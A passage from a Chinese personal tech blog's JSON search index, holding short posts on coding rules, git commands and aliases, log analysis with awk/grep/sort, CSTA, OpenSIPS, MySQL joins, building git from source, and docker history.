5天_ 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。如果你有40 000名员工,这将需要多少费用?\n12. 出去浪,学习新爱好 差异化工作可以增加心智能力,并提供新想法。所以,暂停现在的工作,出去呼吸一下新鲜空气,与朋友交谈,弹吉他等。ps: 莫春者,春服既成,冠者五六人,童子六七人,浴乎沂,风乎舞雩,咏而归。------《论语.先进》。\n13. 在空闲时间学习新事物 当人们停止学习时,他们开始退化。\n","permalink":"https://wdd.js.org/posts/2019/10/corgz1/","summary":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是腰部时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟_ 5天_ 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。如果你有40 000名员工,这将需要多少费用?","title":"【译】13简单的优秀编码规则(从我15年的经验)"},{"content":"如果命令行可以解决的问题,就绝对不要用GUI工具。快点试用Git bash吧, 别再用TortoiseGit了。\n1. 必会8个命令 下面的操作都是经常使用的,有些只需要做一次,有些是经常操作的\ngit命令虽然多,但是经常使用的不超过8个。\n命令 执行次数 说明 git clone http://sdfjslf.git 每个项目只需要执行一次 //克隆一个项目 git fetch origin round-2 每个分支只需要执行一次 //round-2分支在本地不存在,首先要创建一个分支 git checkout round-2 多次 // 切换到round-2分支 git branch --set-upstream-to=origin/round-2 每个分支只需要执行一次 // 将本地round-2分支关联远程round-2分支 git add -A 每次增加文件都要执行 // 在round-2下创建了一个文件, 使用-A可以添加所有文件到暂存区 git commit -am \u0026quot;我增加了一个文件\u0026quot; 每次提交都要执行 // commit git push 每次推送都要执行 //最好是在push之前,使用git pull拉去远程代码到本地,否则有可能被拒绝 git pull 每次拉去都要执行 拉去远程分支代码到本地并合并到当前分支 2. 常用的git命令 假设你在master分支上\n// 将本地修改后的文件推送到本地仓库 git commit -am \u0026#39;修改了一个问题\u0026#39; // 将本地仓库推送到远程仓库 git push 2.1. 状态管理 2.1.1. 状态查看 查看当前仓库状态\ngit status 2.2. 分支管理 2.2.1. 分支新建 基于当前分支,创建test分支\n// 创建dev分支 git checkout dev // 创建dev分支后,切换到dev分支 git checkout -b dev // 以某个commitId为起点创建分支 git checkout -b new-branch-name commit-id 2.2.2. 分支查看 查看远程分支: git branch -r\n// 查看本地分支 git branch // 查看远程分支 git branch -r // 查看所有分支 git branch -a 2.2.3. 分支切换 切换到某个分支: git checkout 0.10.7\n\u0026gt; git checkout 0.10.7 Branch 0.10.7 set up to track remote branch 0.10.7 from origin. Switched to a new branch \u0026#39;0.10.7\u0026#39; 2.2.4. 分支合并 将master分支合并到0.10.7分支: git merge\n\u0026gt; git merge master Merge made by the \u0026#39;recursive\u0026#39; strategy. public/javascripts/app-qc.js | 83 +++++++++++++++++++++++++-- views/menu.html | 1 + views/qc-template-show-modal.html | 114 ++++++++++++++++++++++++++++++++++++++ views/qc-template.html | 7 ++- 4 files changed, 198 insertions(+), 7 deletions(-) create mode 100644 views/qc-template-show-modal.html // 有时候只想合并某次commit到当前分支,而不是合并整个分支,可以使用 cherry-pick 合并 git cherry-pick commmitId 2.2.5. 分支删除 // 删除远程dev分支 git push --delete origin dev // 删除本地dev分支 git branch -D dev 2.2.6. 拉取本地不存在的远程分支 // 假设现在在master分支, 我需要拉去远程的dev分支到本地,而本地没有dev分支 // 拉取远程分支到本地 git fetch orgin 远程分支名:本地分支名 git fetch origin dev:dev // 切换到dev分支 git checkout dev // 本地dev分支关联远程dev分支, 如果不把本地dev分支关联远程dev分支,则执行git pull和git push命令时会报错 git branch --set-upstream-to=origin/dev // 然后你就可以在dev分支上编辑了 2.3. 版本对比 // 查看尚未暂存的文件更新了哪些部分 git diff // 查看某两个版本之间的差异 git diff commitID1 commitID2 // 查看某两个版本的某个文件之间的差异 git diff commitID1:filename1 commitID2:filename2 2.4. 日志查看 git log git short-log 2.5. 撤销修改 2.5.1. 撤销处于修改状态的文件 如果你修改了某个文件,但是还没有commit到本地仓库。\ngit checkout -- somefile.js 2.5 丢弃所有未提交的改变 git clean 用来删除未跟踪的新创建的文件或者文件夹\ngit checkout . \u0026amp;\u0026amp; git clean -xdf\ngit clean\n-x 不读取gitignore中的忽略规则 -d 删除所有未跟踪的文件和文件夹 -f 强制 3. oh-my-zsh中常用的git缩写 alias ga=\u0026#39;git add\u0026#39; alias gb=\u0026#39;git branch\u0026#39; alias gba=\u0026#39;git branch -a\u0026#39; alias gbd=\u0026#39;git branch -d\u0026#39; alias gcam=\u0026#39;git commit -a -m\u0026#39; alias gcb=\u0026#39;git checkout -b\u0026#39; alias gco=\u0026#39;git checkout\u0026#39; alias gcm=\u0026#39;git checkout master\u0026#39; alias gcp=\u0026#39;git cherry-pick\u0026#39; alias gd=\u0026#39;git diff\u0026#39; alias gfo=\u0026#39;git fetch origin\u0026#39; alias ggpush=\u0026#39;git push origin $(git_current_branch)\u0026#39; alias ggsup=\u0026#39;git branch --set-upstream-to=origin/$(git_current_branch)\u0026#39; alias glgp=\u0026#39;git log --stat -p\u0026#39; alias gm=\u0026#39;git merge\u0026#39; alias gp=\u0026#39;git push\u0026#39; alias gst=\u0026#39;git status\u0026#39; alias gsta=\u0026#39;git stash save\u0026#39; alias gstp=\u0026#39;git stash pop\u0026#39; alias gl=\u0026#39;git pull\u0026#39; alias glg=\u0026#39;git log --stat\u0026#39; alias glgp=\u0026#39;git log --stat -p\u0026#39; alias glgga=\u0026#39;git log --graph --decorate --all\u0026#39; // 图形化查看分支之间的发展关系 oh-my-zsh git命令缩写完整版\n4. 参考文献 git 命令参考 《Pro Git 中文版》 廖雪峰 git教程 猴子都能懂的GIT入门 ","permalink":"https://wdd.js.org/posts/2019/10/gmb0oi/","summary":"如果命令行可以解决的问题,就绝对不要用GUI工具。快点试用Git bash吧, 别再用TortoiseGit了。\n1. 必会8个命令 下面的操作都是经常使用的,有些只需要做一次,有些是经常操作的\ngit命令虽然多,但是经常使用的不超过8个。\n命令 执行次数 说明 git clone http://sdfjslf.git 每个项目只需要执行一次 //克隆一个项目 git fetch origin round-2 每个分支只需要执行一次 //round-2分支在本地不存在,首先要创建一个分支 git checkout round-2 多次 // 切换到round-2分支 git branch --set-upstream-to=origin/round-2 每个分支只需要执行一次 // 将本地round-2分支关联远程round-2分支 git add -A 每次增加文件都要执行 // 在round-2下创建了一个文件, 使用-A可以添加所有文件到暂存区 git commit -am \u0026quot;我增加了一个文件\u0026quot; 每次提交都要执行 // commit git push 每次推送都要执行 //最好是在push之前,使用git pull拉去远程代码到本地,否则有可能被拒绝 git pull 每次拉去都要执行 拉去远程分支代码到本地并合并到当前分支 2. 常用的git命令 假设你在master分支上\n// 将本地修改后的文件推送到本地仓库 git commit -am \u0026#39;修改了一个问题\u0026#39; // 将本地仓库推送到远程仓库 git push 2.1. 状态管理 2.","title":"gitbash生存指南 之 git常用命令与oh-my-zsh常用缩写"},{"content":"免费产品的盈利模式有四种\n投放广告 增值服务:先把羊养肥,再慢慢割羊毛,现在大部分都是互联网服务都是这种 交叉补贴: A服务免费,再用户使用A服务时,通过提供B服务来盈利 零边际成本:免费提供A服务,但是用户需要用物品去交换A服务,服务提供者通过加工物品来盈利 ","permalink":"https://wdd.js.org/posts/2019/10/ce03id/","summary":"免费产品的盈利模式有四种\n投放广告 增值服务:先把羊养肥,再慢慢割羊毛,现在大部分都是互联网服务都是这种 交叉补贴: A服务免费,再用户使用A服务时,通过提供B服务来盈利 零边际成本:免费提供A服务,但是用户需要用物品去交换A服务,服务提供者通过加工物品来盈利 ","title":"免费服务的盈利模式"},{"content":"1. 实验准备 T450笔记本 2. 进入BIOS 重启电脑 一直不停按enter 按F1 选择Keyboard/mouse 3. 恢复F1-F2恢复原始功能: fn and ctrl key swap [enabled]\n4. 切换ctrl和ctrl的位置: F1-F12 as primary function [enabled]\n5. 保存,退出 ","permalink":"https://wdd.js.org/posts/2019/10/qzbgvf/","summary":"1. 实验准备 T450笔记本 2. 进入BIOS 重启电脑 一直不停按enter 按F1 选择Keyboard/mouse 3. 恢复F1-F2恢复原始功能: fn and ctrl key swap [enabled]\n4. 切换ctrl和ctrl的位置: F1-F12 as primary function [enabled]\n5. 保存,退出 ","title":"thinkpad 系列恢复F1-F12原始功能,切换ctrl和fn的位置"},{"content":"1. 内容概要 CSTA 协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA 协议标准 2.1. 什么是 CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications) 基本的呼叫模型在 1992 建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等 CSTA 是一个应用层接口,用来监控呼叫,设备和网络 CSTA 创建了一个通讯程序的抽象层: CSTA 并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA 并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式 第三方呼叫控制 一方呼叫控制 CSTA 的设计目标是为了提高各种 CSTA 实现之间的移植性 规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段 1 (发布于 June ’92) 40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段 2 (发布于 Dec. ’94) 77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段 3 - CSTA Phase II Features \u0026amp; versit CTI Technology 发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为 ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec. 02 发布 CSTA WSDL (ECMA-348) June 2004 June 2004: 发布对象模型 TR/88 June 2004: 发布 “Using CSTA for SIP Phone User Agents (uaCSTA)” TR/87 June 2004: 发布 “Application Session Services” (ECMA-354) June 2005: 发布 “WS-Session: WSDL for ECMA-354”(ECMA-366) December 2005 : 发布 “Management Notification and Computing FunctionServices” December 2005 : Session Management, Event Notification, Amendements for ECMA-348” (TR/90) December 2006 : Published new editions of ECMA-269, ECMA-323, ECMA-348 4. CSTA 标准文档 5. CSTA 标准扩展 新的特性可以被加入标准通过发布新版本的标准 新的参数,新的值可以被加入通过发布新版本的标准 未来的新版本必须下向后兼容 具体的实施可以增加属性通过 CSTA 自带的扩展机制(e.g. ONS – One Number Service) 6. CSTA 操作模型 CSTA 操作模型由计算域和转换域组成,是 CSTA 定义在两个域之间的接口 CSTA 标准规定了消息(服务以及事件上报),还有与之相关的行为 计算域是 CSTA 程序的宿主环境,用来与转换域交互与控制 转换域 - CSTA 模型提供抽象层,程序可以观测并控制的。转换渔包括一些对象例如 CSTA 呼叫,设备,链接。 7. CSTA 操作模型:呼叫,设备,链接 相关说明是的的的的\n8. 参考 CSTAoverview CSTA_introduction_and_overview ","permalink":"https://wdd.js.org/opensips/ch1/csta-call-model/","summary":"1. 内容概要 CSTA 协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA 协议标准 2.1. 什么是 CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications) 基本的呼叫模型在 1992 建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等 CSTA 是一个应用层接口,用来监控呼叫,设备和网络 CSTA 创建了一个通讯程序的抽象层: CSTA 并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA 并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式 第三方呼叫控制 一方呼叫控制 CSTA 的设计目标是为了提高各种 CSTA 实现之间的移植性 规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段 1 (发布于 June ’92) 40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段 2 (发布于 Dec. ’94) 77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段 3 - CSTA Phase II Features \u0026amp; versit CTI Technology 发布于 Dec.","title":"CSTA 呼叫模型简介"},{"content":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列\n日志列数比较少或则要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。\n比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk就按列提取。最好用的方式是用 grep 的正则提取。\n好像 grep 不支持捕获分组,所以只能提取出出 cause:\u0026ldquo;AAA\u0026rdquo;,而无法直接提取出 AAA\nE 表示使用正则 o 表示只显示匹配到的内容 \u0026gt; grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBB\u0026#34; cause:\u0026#34;AAA\u0026#34; cause:\u0026#34;BBJ\u0026#34; 统计 对输出的关键词进行统计,并按照升序或者降序排列。\n将关键词按照列或者按照正则提取出来之后,首先要进行sort排序, 然后再进行uniq去重。\n不进行排序就直接去重,统计的值就不准确。因为 uniq 去重只能去除连续的相同字符串。不是连续的字符串,则会统计多次。\n下面例子:非连续的 cause:\u0026ldquo;AAA\u0026rdquo;,没有被合并在一起计数\n// bad grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | uniq -c 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; // good AAA 被正确统计了 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort | uniq -c 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 对统计值排序 sort 默认的排序是按照字典排序, 可以使用-n 参数让其按照数值大小排序。\nn 按照数值排序 r 取反。sort 按照数值排序是,默认是升序,如果想要结果降序,那么需要-r -k -k 可以指定按照某列的数值顺序排序,如-k1,1(指定第一列), -k2,2(指定第二列)。如果不指定-k 参数,那么一般默认第一列。 // 升序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -n 1 cause:\u0026#34;BBB\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 2 cause:\u0026#34;AAA\u0026#34; // 降序排序 grep -Eo \u0026#39;cause:\u0026#34;.*?\u0026#34;\u0026#39; test.log | sort |uniq -c | sort -nr 2 cause:\u0026#34;AAA\u0026#34; 1 cause:\u0026#34;BBJ\u0026#34; 1 cause:\u0026#34;BBB\u0026#34; ","permalink":"https://wdd.js.org/shell/grep-awk-sort/","summary":"test.log\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBB\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 cause:\u0026#34;BBJ\u0026#34; type:\u0026#34;A\u0026#34; loginIn 按列分割 提取第三列\n日志列数比较少或则要提取的字段比较靠前时,优先使用 awk。当然 cut 也可以做到。\n比如输出日志的第三列\nawk \u0026#39;{print $3}\u0026#39; test.log // $3表示第三列 cut -d \u0026#34; \u0026#34; -f3 test.log // -f3指定第三列, -d用来指定分割符 正则提取 提取 cause 字段的原因值?\n2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;A\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; loginIn cause:\u0026#34;BBB\u0026#34; 2019-1010-1920 192.345.23.3 cause:\u0026#34;AAA\u0026#34; type:\u0026#34;S\u0026#34; loginIn 2019-1010-1920 192.345.23.1 type:\u0026#34;A\u0026#34; cause:\u0026#34;BBJ\u0026#34; loginIn 当要提取的内容不在同一列时,往往就无法用cut或者awk就按列提取。最好用的方式是用 grep 的正则提取。","title":"awk、grep、cut、sort、uniq简单命令玩转日志分析与统计"},{"content":"https://winmerge.org/?lang=en\nWinMerge-2.16.4-Setup.exe.zip\n","permalink":"https://wdd.js.org/posts/2019/10/zo8dx2/","summary":"https://winmerge.org/?lang=en\nWinMerge-2.16.4-Setup.exe.zip","title":"windows上免费的文本对比工具"},{"content":"route_tree表中需要增加carrier\nid carrier 0 default ","permalink":"https://wdd.js.org/opensips/ch7/without-default-carrier/","summary":"route_tree表中需要增加carrier\nid carrier 0 default ","title":"ERROR:carrierroute:carrier_tree_fixup: default_carrier not found"},{"content":"Step 1: Install Required PackagesFirstly we need to make sure that we have installed required packages on your system. Use following command to install required packages before compiling Git source.\n# yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel # yum install gcc perl-ExtUtils-MakeMaker Step 2: Uninstall old Git RPMNow remove any prior installation of Git through RPM file or Yum package manager. If your older version is also compiled through source, then skip this step.\n# yum remove git Step 3: Download and Compile Git SourceDownload git source code from kernel git or simply use following command to download Git 2.5.3.\n# cd /usr/src # wget https://www.kernel.org/pub/software/scm/git/git-2.5.3.tar.gz # tar xzf git-2.5.3.tar.gz After downloading and extracting Git source code, Use following command to compile source code.\n# cd git-2.5.3 # make prefix=/usr/local/git all # make prefix=/usr/local/git install # echo \u0026#39;pathmunge /usr/local/git/bin/\u0026#39; \u0026gt; /etc/profile.d/git.sh # chmod +x /etc/profile.d/git.sh # source /etc/bashrc Step 4. Check Git VersionOn completion of above steps, you have successfully install Git in your system. Use the following command to check the git version\n# git --version git version 2.5.3 I also wanted to add that the \u0026ldquo;Getting Started\u0026rdquo; guide at the GIT website also includes instructions on how to download and compile it yourself:\n","permalink":"https://wdd.js.org/posts/2019/10/gxkb91/","summary":"Step 1: Install Required PackagesFirstly we need to make sure that we have installed required packages on your system. Use following command to install required packages before compiling Git source.\n# yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel # yum install gcc perl-ExtUtils-MakeMaker Step 2: Uninstall old Git RPMNow remove any prior installation of Git through RPM file or Yum package manager. If your older version is also compiled through source, then skip this step.","title":"手工安装git最新版"},{"content":"有些项目,文档写的不是很清楚,很多地方都需要摸着石头过河,在此写下自己的一点心得体会。\n后悔药 哪怕是改动一行代码,也要创建一个新的分支。如果发现前方有无法绕行的故障,你将会庆幸自己给自己留下退路。\n不要把自己逼到死角,永远给自己留下一个B计划。\n小碎步 不要大段重构,要小步慢走。尽量减少发生问题的点。在一本书中找错别字很难,但是在一行文字中找错别字就非常容易了。\n勿猜测 当你不知道某个函数如何使用时,不要去猜测,而应该去看官方文档是如何讲解这个函数的。\n","permalink":"https://wdd.js.org/posts/2019/10/bl933p/","summary":"有些项目,文档写的不是很清楚,很多地方都需要摸着石头过河,在此写下自己的一点心得体会。\n后悔药 哪怕是改动一行代码,也要创建一个新的分支。如果发现前方有无法绕行的故障,你将会庆幸自己给自己留下退路。\n不要把自己逼到死角,永远给自己留下一个B计划。\n小碎步 不要大段重构,要小步慢走。尽量减少发生问题的点。在一本书中找错别字很难,但是在一行文字中找错别字就非常容易了。\n勿猜测 当你不知道某个函数如何使用时,不要去猜测,而应该去看官方文档是如何讲解这个函数的。","title":"如何面对未知的项目"},{"content":"一个人喝粥太淡,两个人电话粥太甜。回忆似水流年,翘首如花美眷。对着微信聊天,凌晨了也没有觉得晚。窗外的月亮很圆,就像你那双明亮的眼。说一声晚安,道一声再见,我的梦中是有你的春天。\n","permalink":"https://wdd.js.org/posts/2019/10/an4am1/","summary":"一个人喝粥太淡,两个人电话粥太甜。回忆似水流年,翘首如花美眷。对着微信聊天,凌晨了也没有觉得晚。窗外的月亮很圆,就像你那双明亮的眼。说一声晚安,道一声再见,我的梦中是有你的春天。","title":"一个人喝粥太淡"},{"content":"你有邮箱吗?如果你有的话,那么当我不在你身边的时候,我会每天给你写一封信,告诉你,我今天遇见的的人,告诉你,我身边发生的事,告诉你,当你不在我身边时,我有多想你\n","permalink":"https://wdd.js.org/posts/2019/10/tgn9th/","summary":"你有邮箱吗?如果你有的话,那么当我不在你身边的时候,我会每天给你写一封信,告诉你,我今天遇见的的人,告诉你,我身边发生的事,告诉你,当你不在我身边时,我有多想你","title":"你有邮箱吗?"},{"content":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; ","permalink":"https://wdd.js.org/posts/2019/10/nhrhfr/","summary":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; ","title":"MySql表复制 与 调整字段"},{"content":"表wdd_a 表wdd_b\n不使用where子句生成的表的数是两个表行数的积,其字段的字段两个表的拼接\n查询的行数 = 表a的行数 x 表b的行数\nSELECT * FROM `wdd_a` join `wdd_b` order by wdd_a.id 表联合不使用where子句,会存在两个问题\n查询出来的结果没有意义 产生大量的无用数据,例如1000行的表a联合1000行的表b,将会产生1000*1000行的结果 SELECT * FROM `wdd_a` join `wdd_b` where wdd_a.id = wdd_b.id 当使用表联合之后,产生的数据\n是有意义的 查询结果的行数一定比两张表的行数都要少 下面是一个复杂的例子,给表起了别名,另外也只抽取了部分字段\nSELECT `a`.`id` AS `id`, `a`.`caller_id_dpid` AS `caller_id_dpid`, `a`.`callee_id_dpid` AS `callee_id_dpid`, `a`.`trunk_group` AS `trunk_group`, `b`.`domain` AS `domain` FROM (`wj_route_group` `a` join `domain` `b`) where (`a`.`id` = `b`.`route_group_id`); ","permalink":"https://wdd.js.org/posts/2019/10/gdeknt/","summary":"表wdd_a 表wdd_b\n不使用where子句生成的表的数是两个表行数的积,其字段的字段两个表的拼接\n查询的行数 = 表a的行数 x 表b的行数\nSELECT * FROM `wdd_a` join `wdd_b` order by wdd_a.id 表联合不使用where子句,会存在两个问题\n查询出来的结果没有意义 产生大量的无用数据,例如1000行的表a联合1000行的表b,将会产生1000*1000行的结果 SELECT * FROM `wdd_a` join `wdd_b` where wdd_a.id = wdd_b.id 当使用表联合之后,产生的数据\n是有意义的 查询结果的行数一定比两张表的行数都要少 下面是一个复杂的例子,给表起了别名,另外也只抽取了部分字段\nSELECT `a`.`id` AS `id`, `a`.`caller_id_dpid` AS `caller_id_dpid`, `a`.`callee_id_dpid` AS `callee_id_dpid`, `a`.`trunk_group` AS `trunk_group`, `b`.`domain` AS `domain` FROM (`wj_route_group` `a` join `domain` `b`) where (`a`.`id` = `b`.`route_group_id`); ","title":"理解mysql 表连接"},{"content":"你何时结婚 玩纸牌者 梦 鲍尔夫人的肖像 呐喊 裸体 绿叶 半身像 加歇医生 拿烟斗的男孩 老吉他手 红黄蓝的构成II 蒙德里安 镜前少女 神奈川冲浪 ","permalink":"https://wdd.js.org/posts/2019/10/cgr19x/","summary":"你何时结婚 玩纸牌者 梦 鲍尔夫人的肖像 呐喊 裸体 绿叶 半身像 加歇医生 拿烟斗的男孩 老吉他手 红黄蓝的构成II 蒙德里安 镜前少女 神奈川冲浪 ","title":"世界名画"},{"content":"刀耕火种:没有docker的时代 想想哪些没有docker时光, 我们是怎么玩linux的。\n首先你要先装一个vmware或者virtualbox, 然后再下载一个几个GB的ISO文件,然后一步两步三步的经过十几个步骤,终于装好了一个虚拟机。这其中的步骤,每一步都可能有几个坑在等你踩。\n六年前,也就是在2013的时候,docker出现了,这个新奇的东西,可以让你用一行命令运行一个各种linux的发行版。\ndocker run -it centos docker run -it debian 黑色裂变:docker时代 docker 官网上,有个对docker非常准确的定位:\nDocker: The Modern Platform for High-Velocity Innovation\n我觉得行英文很好理解,但是不好翻译,从中抽取三个一个最终要的关键词。\u0026ldquo;High-Velocty\u0026rdquo;,可以理解为加速,提速。\n那么docker让devops提速了多少呢?\n没有docker的时代,如果可以称为冷兵器时代的话,docker的出现,将devops带入了热兵器时代。\n我们不用再准备石头,木棍,不需要打磨兵器,我们唯一要做的事情,瞄准目标,扣动扳机。\n运筹帷幄:k8s时代 说实在的,我还没仔细去体味docker的时代时,就已经进入了k8s时代。k8s的出现,让我们可以不用管docker, 可以直接跳过docker, 直接学习k8s的概念与命令。\nk8s的好处就不再多少了,只说说它的缺点。\n资源消耗大:k8s单机版没什么意义,一般都是集群,你需要多台虚拟机 部署耗费精力:想要部署k8s,要部署几个配套的基础服务 k8s对于tcp服务支持很好,对于udp服务, 所以如果我们仅仅是需要一个环境,跑跑自己的代码,相比于k8s,docker无疑是最方便且便宜的选择。\n说实在的,我之前一直对docker没有全面的掌握,系统的学习,我将会在这个知识库里,系统的梳理docker相关的知识和实战经验。\n帝国烽烟:云原生时代 微服务 应用编排调度 容器化 面向API 参考 https://en.wikipedia.org/wiki/Docker,_Inc. https://thenewstack.io/10-key-attributes-of-cloud-native-applications/ https://jimmysong.io/kubernetes-handbook/cloud-native/cloud-native-definition.html https://www.redhat.com/en/topics/cloud-native-apps ","permalink":"https://wdd.js.org/posts/2019/10/nzpt8a/","summary":"刀耕火种:没有docker的时代 